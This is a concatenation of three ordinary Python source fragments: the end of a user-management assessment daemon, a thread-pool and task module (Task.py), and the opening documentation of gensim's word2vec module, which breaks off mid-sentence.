LOG.debug('[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> executing ...')
device_id = None
user_id = None
# 1. get current profile
user_profile = data_adapter.get_current_user_profile()
if user_profile is None:
LOG.error('[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> user_profile not found / error')
elif user_profile == -1:
LOG.warning('[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> user_profile not found')
else:
user_id = user_profile['user_id']
device_id = user_profile['device_id']
LOG.log(TRACE, '[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> user_profile found')
# 2. get current sharing model
sharing_model = data_adapter.get_current_sharing_model()
if sharing_model is None:
LOG.error('[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> sharing_model not found / error')
elif sharing_model == -1:
LOG.warning('[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> sharing_model not found')
else:
user_id = sharing_model['user_id']
device_id = sharing_model['device_id']
LOG.log(TRACE, '[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> sharing_model found')
if not user_id is None and not device_id is None:
LOG.log(TRACE, '[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> checking values ...')
# 3. Get information:
# - battery
battery_level = data_adapter.get_power()
# battery_level = 50 # TODO
# - total services running
total_services = data_adapter.get_total_services_running()
# 4. check information and send warning to Lifecycle if needed
result = __check_resources_used(user_profile, sharing_model, battery_level, total_services)
if not result:
LOG.debug("[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> no violations: result: " + str(result))
else:
LOG.debug("[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> violations found: result: " + str(result))
LOG.log(TRACE, '[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> generating warning / sending notification ...')
mf2c.send_warning(user_id, device_id, user_profile, sharing_model, result)
else:
LOG.warning('[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> cannot check values')
# wait 300 seconds
LOG.debug('[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> Waiting 5m (300s) for next execution ...')
time.sleep(300)
except:
LOG.exception('[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> Exception')
# start process
def start():
global execute
global d
LOG.debug("[usermgnt.modules.assessment] [start] << Assessment Process >> Starting assessment process [execute=" + str(execute) + "]")
if d is None:
LOG.debug("[usermgnt.modules.assessment] [start] << Assessment Process >> [d is None]")
d = threading.Thread(target=__daemon) #(name='daemon', target=daemon)
d.setDaemon(True)
execute = True
d.start()
return "started"
else:
LOG.warning("[usermgnt.modules.assessment] [start] << Assessment Process >> [execute: " + str(execute) + "; d.isAlive(): " + str(d.isAlive()) + "]")
return "???"
# stop process
def stop():
global execute
global d
LOG.debug("[usermgnt.modules.assessment] [stop] << Assessment Process >> Stopping assessment process [execute=" + str(execute) + "]")
if d is None:
LOG.warning('[usermgnt.modules.assessment] [stop] << Assessment Process >> [execute: ' + str(execute) + '; d.isAlive(): None]')
return "???"
else:
LOG.debug('[usermgnt.modules.assessment] [stop] << Assessment Process >> [d.join()]')
execute = False
d.join()
d = None
return "Stopped"
# return status
def get_status():
global execute
global d
LOG.debug("[usermgnt.modules.assessment] [get_status] << Assessment Process >> Getting assessment process status [execute=" + str(execute) + "]")
if d is None:
return "Not initialized"
elif execute and d.isAlive() == True:
return "Running"
elif execute:
return "???"
else:
return "Stopped"
|
Task.py
|
#
# Task.py -- Basic command pattern and thread pool implementation.
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
from __future__ import absolute_import, print_function
from ..util import six
from ..util.six.moves import map
import sys
import time
import threading
import traceback
if six.PY2:
import thread
import Queue
else:
import _thread as thread
import queue as Queue
# NOTE: See http://bugs.python.org/issue7946
# we cannot effectively use threading for loading files/network/etc.
# without setting the switchinterval down on python 3 due to the new
# GIL implementation
_swival = 0.000001
sys.setswitchinterval(_swival)
from . import Callback # noqa
class TaskError(Exception):
"""Exception generated for task errors"""
pass
class TaskTimeout(TaskError):
"""Exception generated when timing out waiting on a task"""
pass
class UserTaskException(Exception):
pass
# ------------ BASIC TASKS ------------
class Task(Callback.Callbacks):
"""This class implements a basic Task (command) abstraction. The
methods define the interface for starting, cancelling, waiting on a
task, etc.
"""
def __init__(self):
"""
The constructor sets bare essentials for a Task object. See the
initialize() and start() methods.
"""
self.ev_done = threading.Event()
self.tag = None
self.logger = None
self.threadPool = None
# Lock for task state critical sections
self.tlock = threading.RLock()
# Parent task can set this (or add to it) explicitly to determine
# which values will be copied when it calls initialize() on a child
# task.
self.shares = ['logger', 'threadPool', 'shares']
super(Task, self).__init__()
self.enable_callback('resolved')
def initialize(self, taskParent, override=None):
"""This method initializes a task for (re)use. taskParent is the
object instance of the parent task, or a 'task environment' (something
that runs tasks).
If subclass overrides this method, it should call the superclass
method at some point.
- Copy shared data from taskParent, overriding items from _override_
if they are present there ('contagion' of task values).
- Generate a unique tag, to be used with the Gen2 Monitor.
- Clear done event, initialize times and result.
"""
# For now, punt if we have no apparent parent
if taskParent and hasattr(taskParent, 'shares'):
# Copy some variables from our parent task, unless they are being
# overridden explicitly. Using this general "contagion" mechanism,
# a task can cause it's children to have values available to them
# without passing them explicitly.
for var in taskParent.shares:
if override and var in override:
self.__dict__[var] = override[var]
else:
#print "COPYING VAR FROM PARENT: %s(%s)" % (var, str(taskParent.__dict__[var]))
self.__dict__[var] = taskParent.__dict__[var]
else:
#raise TaskError("Cannot initialize task without a taskParent!")
pass
# Generate our own unique tag. 'tagger' should have been transmitted
# from the parent task
if not self.tag:
try:
self.tag = str(taskParent) + '.' + self.tagger.get_tag(self)
except Exception:
# Failed--fall back to internal tagger
self.tag = get_tag(taskParent)
# Some per-task specific initialization
self.ev_done.clear()
self.starttime = time.time()
self.endtime = 0
self.totaltime = 0
self.result = None
return self.tag
def start(self):
"""This method starts a task executing and returns immediately.
Subclass should override this method, if it has an asynchronous
way to start the task and return immediately.
"""
if self.threadPool:
self.threadPool.addTask(self)
# Lets other threads have a chance to run
time.sleep(0)
else:
raise TaskError("start(): nothing to start for task %s" % self)
def init_and_start(self, taskParent, override={}):
"""Convenience method to initialize and start a task.
"""
tag = self.initialize(taskParent, override=override)
self.start()
return tag
def check_state(self):
"""Abstract method that should check for pause, cancellation, or
any other sort of preemption event.
"""
pass
def extend_shares(self, varlist):
shares = set(self.shares)
for var in varlist:
if hasattr(self, var):
shares.add(var)
self.shares = shares
def stop(self):
"""This method cancels an executing task (if possible).
Subclass should override this method.
Return True if task could be cancelled, False if not?
"""
raise TaskError("Task %s: subclass should override stop() method!" % (
self))
def pause(self):
"""This method pauses an executing task (if possible).
Subclass should override this method.
Return True if task could be paused, False if not?
"""
raise TaskError("Task %s: subclass should override pause() method!" % (
self))
def resume(self):
"""This method resumes an executing task (if possible).
Subclass should override this method, should not call super.resume().
Return True if task could be resumed, False if not?
"""
raise TaskError("Task %s: subclass should override resume() method!" % (
self))
def wait(self, timeout=None):
"""This method waits for an executing task to finish.
Subclass can override this method if necessary.
"""
self.ev_done.wait(timeout=timeout)
if not self.ev_done.is_set():
raise TaskTimeout("Task %s timed out." % self)
# --> self.result is set
# If it is an exception, then raise it in this waiter
if isinstance(self.result, Exception):
raise self.result
# Release waiters and perform callbacks
# done() has already been called, because of self.ev_done check
# "asynchronous" tasks should could call done() here
#self.done(self.result)
return self.result
def step(self):
"""If a task has a way of stepping through an operation. It can
implement this method. Subclass should not call super.step().
"""
raise TaskError("Task %s: subclass should override step() method!" %
self)
def execute(self):
"""This method does the work of a task (if executed by the
thread pool) and returns when it is finished. *** Subclass should
override this method! *** It should take no arguments, and can
return anything.
"""
raise TaskError("Task %s: subclass should override execute() method!" %
self)
def done(self, result, noraise=False):
"""This method is called when a task has finished executing.
Subclass can override this method if desired, but should call
superclass method at the end.
"""
# [??] Should this be in a critical section?
# Has done() already been called on this task?
if self.ev_done.is_set():
# ??
if isinstance(self.result, Exception) and (not noraise):
raise self.result
return self.result
# calculate running time and other finalization
self.endtime = time.time()
try:
self.totaltime = self.endtime - self.starttime
except AttributeError:
# task was not initialized properly
self.totaltime = 0.0
self.result = result
# Release thread waiters
self.ev_done.set()
# Perform callbacks for event-style waiters
self.make_callback('resolved', self.result)
# If the result is an exception, then our final act is to raise
# it in the caller, unless the caller explicitly supressed that
if isinstance(result, Exception) and (not noraise):
raise result
return result
def get_tag(self):
"""This is only valid AFTER initialize() has been called on the task.
"""
return self.tag
def __str__(self):
"""Returns a string representation of a task (e.g. for debugging).
Subclass can override this method if desired.
"""
return str(self.tag)
def __lt__(self, other):
return False
def getExecutionTime(self):
return self.totaltime
def runTask(self, task, timeout=None):
"""Run a child task to completion. Returns the result of
the child task.
"""
# Initialize the task.
task.initialize(self)
# Start the task.
task.start()
# Lets other threads run
time.sleep(0)
# Wait for it to finish.
res = task.wait(timeout=timeout)
# Now we're done
return res
def run(self, task, timeout=None):
"""Run a child task to completion. Returns the result of
the child task. Simply calls runTask().
"""
return self.runTask(task, timeout=timeout)
# For testing...
class printTask(Task):
"""Simple task that prints msg."""
def __init__(self, msg):
self.msg = msg
super(printTask, self).__init__()
def execute(self):
print(self.msg)
class sleepTask(Task):
"""Simple task that sleeps for delay seconds."""
def __init__(self, delay):
self.delay = delay
super(sleepTask, self).__init__()
def execute(self):
self.ev_done.wait(timeout=self.delay)
class FuncTask(Task):
"""Simple task that calls func and returns func's return value."""
def __init__(self, func, args, kwdargs, logger=None):
self.func = func
self.args = args
self.kwdargs = kwdargs
self.logger = logger
super(FuncTask, self).__init__()
def execute(self):
if self.logger:
# Cap logging size around 500 characters
s_args = str(self.args)
if len(s_args) > 500:
s_args = s_args[:500]
s_kwdargs = str(self.kwdargs)
if len(s_kwdargs) > 500:
s_kwdargs = s_kwdargs[:500]
self.logger.debug("Running %s(%s, %s)" % (
self.func.__name__, s_args, s_kwdargs))
s_args = None
s_kwdargs = None
try:
res = self.func(*self.args, **self.kwdargs)
self.done(res)
if self.logger:
self.logger.debug("Function returned %s" % (
str(res)))
except Exception as e:
if self.logger:
self.logger.error("Task '%s' terminated with exception: %s" %
(str(self), str(e)))
try:
(type, value, tb) = sys.exc_info()
self.logger.error("Traceback:\n%s" %
"".join(traceback.format_tb(tb)))
tb = None
except Exception:
self.logger.error("Traceback information unavailable.")
self.done(e)
class FuncTask2(FuncTask):
"""Simple task that calls func and returns func's return value.
This version lets you specify the positional and keyword arguments
more naturally 'in place' in the constructor.
"""
def __init__(self, func, *args, **kwdargs):
super(FuncTask2, self).__init__(func, args, kwdargs)
def set_logger(self, logger):
self.logger = logger
def make_tasker(func):
"""make_tasker takes a callable (function, method, etc.) and returns
a new factory function for generating tasks. Each factory function is
designed to consume its arguments and return a task that, when executed,
will call the function upon the arguments.
TODO: deprecate this and just use FuncTask, which is easier to
understand--must change a number of programs first.
"""
def anonFunc(*args, **kwdargs):
class anonTask(Task):
def execute(self):
self.logger.debug("Executing fn %s" % func)
try:
val = func(*args, **kwdargs)
self.logger.debug("Done executing fn %s" % func)
return val
except Exception as e:
# Log error message and re-raise exception.
self.logger.error("fn %s raised exception: %s" % (
func, str(e)))
raise e
return anonTask()
return anonFunc
# ------------ COMPOUND TASKS ------------
class SequentialTaskset(Task):
"""Compound task that runs a series of tasks sequentially.
"""
def __init__(self, taskseq):
super(SequentialTaskset, self).__init__()
self.tasklist = list(taskseq)
def initialize(self, taskParent, **kwdargs):
self.index = 0
super(SequentialTaskset, self).initialize(taskParent, **kwdargs)
def step(self):
"""Run the next child task and wait for completion (no timeout)."""
if self.index >= len(self.tasklist):
raise TaskError("step(): sequential compound task %s finished" % self)
self.check_state()
# Select next task from the set and advance the index
self.task = self.tasklist[self.index]
self.index += 1
return self.runTask(self.task)
def execute(self):
"""Run all child tasks, in order, waiting for completion of each.
Return the result of the final child task's execution.
"""
while self.index < len(self.tasklist):
res = self.step()
self.logger.debug('SeqSet task %i has completed with result %s' %
(self.index, res))
# Returns result of last task to quit
return res
def stop(self):
"""Interrupt/cancel execution, but will allow current child task
to complete."""
#self.ev_intr.set()
try:
self.task.stop()
except TaskError as e:
self.logger.error("Error cancelling child task: %s" % (str(e)))
def addTask(self, task):
"""Append a task to the task sequence. If the SequentialTaskset has
already completed execution, this will do nothing unless it is
restarted (initialize(), start()).
"""
self.tasklist.append(task)
class oldConcurrentAndTaskset(Task):
"""Compound task that runs a set of tasks concurrently, and does not
return until they all terminate.
"""
def __init__(self, taskseq):
super(oldConcurrentAndTaskset, self).__init__()
self.taskseq = taskseq
self.ev_intr = threading.Event()
# Used to synchronize compound task termination
self.regcond = threading.Condition()
def execute(self):
"""Run all child tasks concurrently in separate threads.
Return 0 after all child tasks have completed execution.
"""
self.count = 0
self.taskset = []
self.results = {}
self.totaltime = time.time()
# Register termination callbacks for all my child tasks.
for task in list(self.taskseq):
self.taskset.append(task)
task.add_callback('resolved', self.child_done, self.count)
self.count += 1
self.numtasks = self.count
# Now start each child task.
with self.regcond:
for task in list(self.taskset):
task.initialize(self)
task.start()
# Account for time needed to start subtasks
self.totaltime = time.time() - self.totaltime
# Now give up the critical section and wait for last child
# task to terminate.
while self.count > 0:
self.regcond.wait()
# Scan results for errors (exceptions) and raise the first one we find
for key in self.results.keys():
value = self.results[key]
if isinstance(value, Exception):
(count, task) = key
self.logger.error("Child task %s terminated with exception: %s" % (
task.tag, str(value)))
raise value
return 0
def child_done(self, task, result, count):
"""Acquire the condition variable for the compound task object.
Decrement the thread count. If we are the last thread to
finish, release compound task thread, which is blocked in execute().
"""
with self.regcond:
self.logger.debug('Concurrent task %d/%d has completed' % (
self.count, self.numtasks))
self.count -= 1
self.taskset.remove(task)
self.totaltime += task.getExecutionTime()
self.results[(count, task)] = result
if self.count <= 0:
self.regcond.notifyAll()
def stop(self):
"""Call stop() on all child tasks, and ignore TaskError exceptions.
Behavior depends on what the child tasks' stop() method does."""
for task in self.taskset:
try:
task.stop()
except TaskError as e:
# Task does not have a way to stop it.
# TODO: notify who?
pass
def addTask(self, task):
"""Add a task to the task set.
"""
with self.regcond:
self.taskset.append(task)
task.add_callback('resolved', self.child_done, self.numtasks)
self.numtasks += 1
self.count += 1
task.initialize(self)
task.start()
class newConcurrentAndTaskset(Task):
"""Compound task that runs a set of tasks concurrently, and does not
return until they all terminate.
"""
def __init__(self, taskseq):
super(newConcurrentAndTaskset, self).__init__()
self.taskseq = taskseq
# tuning value for polling inefficiency
self.idletime = 0.001
# internal mutex
self._lock_c = threading.RLock()
def execute(self):
"""Run all child tasks concurrently in separate threads.
Return last result after all child tasks have completed execution.
"""
with self._lock_c:
self.count = 0
self.numtasks = 0
self.taskset = []
self.results = {}
self.totaltime = time.time()
# Start all tasks
for task in self.taskseq:
self.taskset.append(task)
self.numtasks += 1
task.init_and_start(self)
num_tasks = self.getNumTasks()
# Wait on each task to clean up results
while num_tasks > 0:
self.check_state()
for i in range(num_tasks):
try:
try:
task = self.getTask(i)
except IndexError:
# A task got deleted from the set. Jump back out
# to outer loop and repoll the number of tasks
break
#self.logger.debug("waiting on %s" % task)
res = task.wait(timeout=self.idletime)
#self.logger.debug("finished: %s" % task)
self.child_done(res, task)
except TaskTimeout:
continue
except Exception as e:
#self.logger.warning("Subtask propagated exception: %s" % str(e))
self.child_done(e, task)
continue
# wait a bit and try again
#self.ev_quit.wait(self.idletime)
# re-get number of tasks, in case some were added or deleted
num_tasks = self.getNumTasks()
# Scan results for errors (exceptions) and raise the first one we find
for key in self.results.keys():
value = self.results[key]
if isinstance(value, Exception):
(count, task) = key
self.logger.error("Child task %s terminated with exception: %s" % (
task.tag, str(value)))
raise value
# Return value of last child to complete
return value
def child_done(self, result, task):
with self._lock_c:
self.count += 1
self.logger.debug('Concurrent task %d/%d has completed' % (
self.count, self.numtasks))
self.taskset.remove(task)
self.totaltime += task.getExecutionTime()
self.results[(self.count, task)] = result
def stop(self):
"""Call stop() on all child tasks, and ignore TaskError exceptions.
Behavior depends on what the child tasks' stop() method does."""
with self._lock_c:
for task in self.taskset:
try:
task.stop()
except TaskError as e:
# Task does not have a way to stop it.
# TODO: notify who?
pass
# stop ourself
#self.ev_intr.set()
def addTask(self, task):
"""Add a task to the task set.
"""
# Try to start task first. If it fails then we don't need to
# undo adding it to taskset
task.initialize(self)
task.start()
with self._lock_c:
self.numtasks += 1
self.taskset.append(task)
def getTask(self, i):
with self._lock_c:
return self.taskset[i]
def getNumTasks(self):
"""Get the set of active tasks.
"""
with self._lock_c:
return len(self.taskset)
class ConcurrentAndTaskset(newConcurrentAndTaskset):
pass
class QueueTaskset(Task):
"""Compound task that runs a set of tasks that it reads from a queue
concurrently. If _waitflag_ is True, then it will run each task to
completion before starting the next task.
"""
def __init__(self, queue, waitflag=True, timeout=0.1, ev_quit=None):
super(QueueTaskset, self).__init__()
self.queue = queue
self.waitflag = waitflag
self.lock = threading.RLock()
self.timeout = timeout
self.task = None
self.ev_cancel = threading.Event()
self.ev_pause = threading.Event()
if ev_quit is None:
ev_quit = threading.Event()
self.ev_quit = ev_quit
def flush(self):
# Flush queue of pending tasks
self.logger.debug("Flushing queue.")
while True:
try:
self.queue.get(block=False)
except Queue.Empty:
break
def stop(self):
self.flush()
#self.ev_intr.set()
try:
if self.task:
self.task.stop()
except TaskError as e:
#self.logger.error("Error cancelling child task: %s" % (str(e)))
pass
# put termination sentinel
self.queue.put(None)
def stop_child(self):
self.flush()
try:
if self.task:
self.task.stop()
except TaskError as e:
#self.logger.error("Error cancelling child task: %s" % (str(e)))
pass
def execute(self):
self.count = 0
self.totaltime = 0
self.logger.debug("Queue Taskset starting")
while not self.ev_quit.is_set():
try:
self.check_state()
task = self.queue.get(block=True, timeout=self.timeout)
if task is None:
# termination sentinel
break
self.task = task
task.add_callback(self.child_done)
with self.lock:
self.count += 1
self.ev_cancel.clear()
try:
task.initialize(self)
self.logger.debug("Starting task '%s'" % str(task))
task.start()
if self.waitflag:
res = task.wait()
self.logger.debug("Task %s terminated with result %s" % (
(str(task), str(res))))
except Exception as e:
self.logger.error("Task '%s' terminated with exception: %s" %
(str(task), str(e)))
try:
(type, value, tb) = sys.exc_info()
self.logger.debug("Traceback:\n%s" %
"".join(traceback.format_tb(tb)))
# NOTE: to avoid creating a cycle that might cause
# problems for GC--see Python library doc for sys
# module
tb = None
except Exception as e:
self.logger.debug("Traceback information unavailable.")
# If task raised exception then it didn't call done,
task.done(e, noraise=True)
except Queue.Empty:
# No task available. Continue trying to get one.
continue
# TODO: should we wait for self.count > 0?
self.logger.debug("Queue Taskset terminating")
return self.result
def child_done(self, task, result):
with self.lock:
self.count -= 1
self.totaltime += task.getExecutionTime()
self.result = result
def cancel(self):
self.flush()
super(QueueTaskset, self).cancel()
def addTask(self, task):
self.queue.put(task)
# ------------ PRIORITY QUEUES ------------
class PriorityQueue(Queue.PriorityQueue):
pass
# ------------ WORKER THREADS ------------
class _WorkerReset(Exception):
"""Local exception used to reset a worker thread."""
pass
class WorkerThread(object):
"""Container for a thread in which to call the execute() method of a task.
A WorkerThread object waits on the task queue, executes a task when it
appears, and repeats. A call to start() is necessary to start servicing
the queue, and a call to stop() will terminate the service.
"""
def __init__(self, queue, logger=None, ev_quit=None,
timeout=0.2, tpool=None):
self.queue = queue
self.logger = logger
self.timeout = timeout
if ev_quit:
self.ev_quit = ev_quit
else:
self.ev_quit = threading.Event()
self.tpool = tpool
self.lock = threading.RLock()
self.status = 'stopped'
self.time_start = 0.0
def setstatus(self, status):
"""Sets our status field so that others can inquire what we are doing.
Set of status:
starting, idle
"""
with self.lock:
self.status = status
def getstatus(self):
"""Returns our status--a string describing what we are doing.
"""
with self.lock:
return (self.status, self.time_start)
def execute(self, task):
"""Execute a task.
"""
taskid = str(task)
res = None
try:
# Try to run the task. If we catch an exception, then
# it becomes the result.
self.time_start = time.time()
self.setstatus('executing %s' % taskid)
self.logger.debug("now executing task '%s'" % taskid)
try:
res = task.execute()
except UserTaskException as e:
res = e
except Exception as e:
self.logger.error("Task '%s' raised exception: %s" %
(str(task), str(e)))
res = e
try:
(type, value, tb) = sys.exc_info()
self.logger.debug("Traceback:\n%s" %
"".join(traceback.format_tb(tb)))
# NOTE: to avoid creating a cycle that might cause
# problems for GC--see Python library doc for sys
# module
tb = None
except Exception as e:
self.logger.debug("Traceback information unavailable.")
finally:
self.logger.debug("done executing task '%s'" % str(task))
self.setstatus('cleaning %s' % taskid)
# Wake up waiters on other threads
task.done(res, noraise=True)
self.time_start = 0.0
self.setstatus('idle')
# Basic task execution loop. Dequeue a task and run it, then look
# for another one
def taskloop(self):
self.setstatus('starting')
self.logger.debug('Starting worker thread loop.')
# If we were handed a thread pool upon startup, then register
# ourselves with it.
if self.tpool:
self.tpool.register_up()
try:
self.setstatus('idle')
while not self.ev_quit.is_set():
try:
# Wait on our queue for a task; will timeout in
# self.timeout secs
(priority, task) = self.queue.get(block=True,
timeout=self.timeout)
if task is None:
# termination sentinel
self.queue.put((priority, task))
break
self.execute(task)
except _WorkerReset:
self.logger.info("Worker reset!")
except Queue.Empty as e:
# Reach here when we time out waiting for a task
pass
finally:
self.logger.debug('Stopping worker thread loop.')
if self.tpool:
self.tpool.register_dn()
self.setstatus('stopped')
def start(self):
self.thread = threading.Thread(target=self.taskloop, args=[])
self.thread.start()
def stop(self):
# Put termination sentinal on queue
self.queue.put((0, None))
self.ev_quit.set()
# ------------ THREAD POOL ------------
class ThreadPool(object):
"""A simple thread pool for executing tasks asynchronously.
self.status states:
down no threads are ready for service
up all threads are ready for service
start threads are starting, but not all of them are up yet
stop threads are stopping, but not all of them are down yet
"""
def __init__(self, numthreads=1, logger=None, ev_quit=None,
workerClass=WorkerThread):
self.numthreads = numthreads
self.logger = logger
if ev_quit:
self.ev_quit = ev_quit
else:
self.ev_quit = threading.Event()
self.lock = threading.RLock()
self.workerClass = workerClass
self.queue = PriorityQueue()
self.workers = []
self.tids = []
# Used to synchronize thread pool startup (see register() method)
self.regcond = threading.Condition()
self.runningcount = 0
self.status = 'down'
def startall(self, wait=False, **kwdargs):
"""Start all of the threads in the thread pool. If _wait_ is True
then don't return until all threads are up and running. Any extra
keyword arguments are passed to the worker thread constructor.
"""
self.logger.debug("startall called")
with self.regcond:
while self.status != 'down':
if self.status in ('start', 'up') or self.ev_quit.is_set():
# For now, abandon additional request to start
self.logger.error("ignoring duplicate request to start thread pool")
return
self.logger.debug("waiting for threads: count=%d" %
self.runningcount)
self.regcond.wait()
#assert(self.status == 'down')
if self.ev_quit.is_set():
return
self.runningcount = 0
self.status = 'start'
self.workers = []
if wait:
tpool = self
else:
tpool = None
# Start all worker threads
self.logger.debug("starting threads in thread pool")
for i in range(self.numthreads):
t = self.workerClass(self.queue, logger=self.logger,
ev_quit=self.ev_quit, tpool=tpool,
**kwdargs)
self.workers.append(t)
t.start()
# if started with wait=True, then expect that threads will register
# themselves and last one up will set status to "up"
if wait:
# Threads are on the way up. Wait until last one starts.
while self.status != 'up' and not self.ev_quit.is_set():
self.logger.debug("waiting for threads: count=%d" %
self.runningcount)
self.regcond.wait()
else:
# otherwise, we just assume the pool is up
self.status = 'up'
self.logger.debug("startall done")
def addThreads(self, numthreads, **kwdargs):
with self.regcond:
# Start all worker threads
self.logger.debug("adding %d threads to thread pool" % (
numthreads))
for i in range(numthreads):
t = self.workerClass(self.queue, logger=self.logger,
ev_quit=self.ev_quit, tpool=self.tpool,
**kwdargs)
self.workers.append(t)
t.start()
self.numthreads += numthreads
def stopall(self, wait=False):
"""Stop all threads in the worker pool. If _wait_ is True
then don't return until all threads are down.
"""
self.logger.debug("stopall called")
with self.regcond:
while self.status != 'up':
if self.status in ('stop', 'down') or self.ev_quit.is_set():
# For now, silently abandon additional request to stop
self.logger.warning("ignoring duplicate request to stop thread pool.")
return
self.logger.debug("waiting for threads: count=%d" %
self.runningcount)
self.regcond.wait()
#assert(self.status == 'up')
self.logger.debug("stopping threads in thread pool")
self.status = 'stop'
# Signal to all threads to terminate.
self.ev_quit.set()
if wait:
# Threads are on the way down. Wait until last one quits.
while self.status != 'down':
self.logger.debug("waiting for threads: count=%d" %
self.runningcount)
self.regcond.wait()
self.logger.debug("stopall done")
def workerStatus(self):
return list(map(lambda t: t.getstatus(), self.workers))
def addTask(self, task, priority=0):
"""Add a task to the queue of tasks.
The task will be executed in a worker thread as soon as one is available.
Tasks are executed in first-come-first-served order.
"""
self.queue.put((priority, task))
def delTask(self, taskid):
self.logger.error("delTask not yet implemented")
def purgeTasks(self):
self.logger.error("purgeTasks not yet implemented")
def register_up(self):
"""Called by WorkerThread objects to register themselves.
Acquire the condition variable for the WorkerThread objects.
Increment the running-thread count. If we are the last thread to
start, set status to 'up'. This allows startall() to complete
if it was called with wait=True.
"""
with self.regcond:
self.runningcount += 1
tid = thread.get_ident()
self.tids.append(tid)
self.logger.debug("register_up: (%d) count is %d" %
(tid, self.runningcount))
if self.runningcount == self.numthreads:
self.status = 'up'
self.regcond.notify()
def register_dn(self):
"""Called by WorkerThread objects to register themselves.
Acquire the condition variable for the WorkerThread objects.
Decrement the running-thread count. If we are the last thread to
start, release the ThreadPool thread, which is stuck in start()
"""
with self.regcond:
self.runningcount -= 1
tid = thread.get_ident()
self.tids.remove(tid)
self.logger.debug("register_dn: count_dn is %d" % self.runningcount)
self.logger.debug("register_dn: remaining: %s" % str(self.tids))
if self.runningcount == 0:
self.status = 'down'
self.regcond.notify()
# ------------ SUPPORT FUNCTIONS ------------
_lock_seqnum = threading.Lock()
_count_seqnum = 0
def get_tag(taskParent):
global _count_seqnum
with _lock_seqnum:
generic_id = 'task%d' % (_count_seqnum)
_count_seqnum += 1
if taskParent:
tag = str(taskParent) + '.' + generic_id
else:
tag = generic_id
return tag
# END
|
word2vec.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Author: Gensim Contributors
# Copyright (C) 2018 RaRe Technologies s.r.o.
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
Introduction
============
This module implements the word2vec family of algorithms, using highly optimized C routines,
data streaming and Pythonic interfaces.
The word2vec algorithms include skip-gram and CBOW models, using either
hierarchical softmax or negative sampling: `Tomas Mikolov et al: Efficient Estimation of Word Representations
in Vector Space <https://arxiv.org/pdf/1301.3781.pdf>`_, `Tomas Mikolov et al: Distributed Representations of Words
and Phrases and their Compositionality <https://arxiv.org/abs/1310.4546>`_.
Other embeddings
================
There are more ways to train word vectors in Gensim than just Word2Vec.
See also :class:`~gensim.models.doc2vec.Doc2Vec`, :class:`~gensim.models.fasttext.FastText`.
The training algorithms were originally ported from the C package https://code.google.com/p/word2vec/
and extended with additional functionality and
`optimizations <https://rare-technologies.com/parallelizing-word2vec-in-python/>`_ over the years.
For a tutorial on Gensim word2vec, with an interactive web app trained on GoogleNews,
visit https://rare-technologies.com/word2vec-tutorial/.
Usage examples
==============
Initialize a model with e.g.:
.. sourcecode:: pycon
>>> from gensim.test.utils import common_texts
>>> from gensim.models import Word2Vec
>>>
>>> model = Word2Vec(sentences=common_texts, vector_size=100, window=5, min_count=1, workers=4)
>>> model.save("word2vec.model")
**The training is streamed, so ``sentences`` can be an iterable**, reading input data
from the disk or network on-the-fly, without loading your entire corpus into RAM.
Note the ``sentences`` iterable must be *restartable* (not just a generator), to allow the algorithm
to stream over your dataset multiple times. For some examples of streamed iterables,
see :class:`~gensim.models.word2vec.BrownCorpus`,
:class:`~gensim.models.word2vec.Text8Corpus` or :class:`~gensim.models.word2vec.LineSentence`.
If you save the model you can continue training it later:
.. sourcecode:: pycon
>>> model = Word2Vec.load("word2vec.model")
>>> model.train([["hello", "world"]], total_examples=1, epochs=1)
(0, 2)
The trained word vectors are stored in a :class:`~gensim.models.keyedvectors.KeyedVectors` instance, as `model.wv`:
.. sourcecode:: pycon
>>> vector = model.wv['computer'] # get numpy vector of a word
>>> sims = model.wv.most_similar('computer', topn=10) # get other similar words
The reason for separating the trained vectors into `KeyedVectors` is that if you don't
need the full model state any more (don't need to continue training), its state can discarded,
keeping just the vectors and their keys proper.
This results in a much smaller and faster object that can be mmapped for lightning
fast loading and sharing the vectors in RAM between processes:
.. sourcecode:: pycon
>>> from gensim.models import KeyedVectors
>>>
>>> # Store just the words + their trained embeddings.
>>> word_vectors = model.wv
>>> word_vectors.save("word2vec.wordvectors")
>>>
>>> # Load back with memory-mapping = read-only, shared across processes.
>>> wv = KeyedVectors.load("word2vec.wordvectors", mmap='r')
>>>
>>> vector = wv['computer'] # Get numpy vector of a word
Gensim can also load word vectors in the "word2vec C format", as a
:class:`~gensim.models.keyedvectors.KeyedVectors` instance:
.. sourcecode:: pycon
>>> from gensim.test.utils import datapath
>>>
>>> # Load a word2vec model stored in the C *text* format.
>>> wv_from_text = KeyedVectors.load_word2vec_format(datapath('word2vec_pre_kv_c'), binary=False)
>>> # Load a word2vec model stored in the C *binary* format.
>>> wv_from_bin = KeyedVectors.load_word2vec_format(datapath("euclidean_vectors.bin"), binary=True)
It is impossible to continue training the vectors loaded from the C format because the hidden weights,
vocabulary frequencies and the binary tree are missing. To continue training, you'll need the
full :class:`~gensim.models.word2vec.Word2Vec` object state, as stored by :meth:`~gensim.models.word2vec.Word2Vec.save`,
not just the :class:`~gensim.models.keyedvectors.KeyedVectors`.
You can perform various NLP tasks with a trained model. Some of the operations
are already built-in - see :mod:`gensim.models.keyedvectors`.
If you're finished training a model (i.e. no more updates, only querying),
you can switch to the :class:`~gensim.models.keyedvectors.KeyedVectors` instance:
.. sourcecode:: pycon
>>> word_vectors = model.wv
>>> del model
to trim unneeded model state = use much less RAM and allow fast loading and memory sharing (mmap).
Embeddings with multiword ngrams
================================
There is a :mod:`gensim.models.phrases` module which lets you automatically
detect phrases longer than one word, using collocation statistics.
Using phrases, you can learn a word2vec model where "words" are actually multiword expressions,
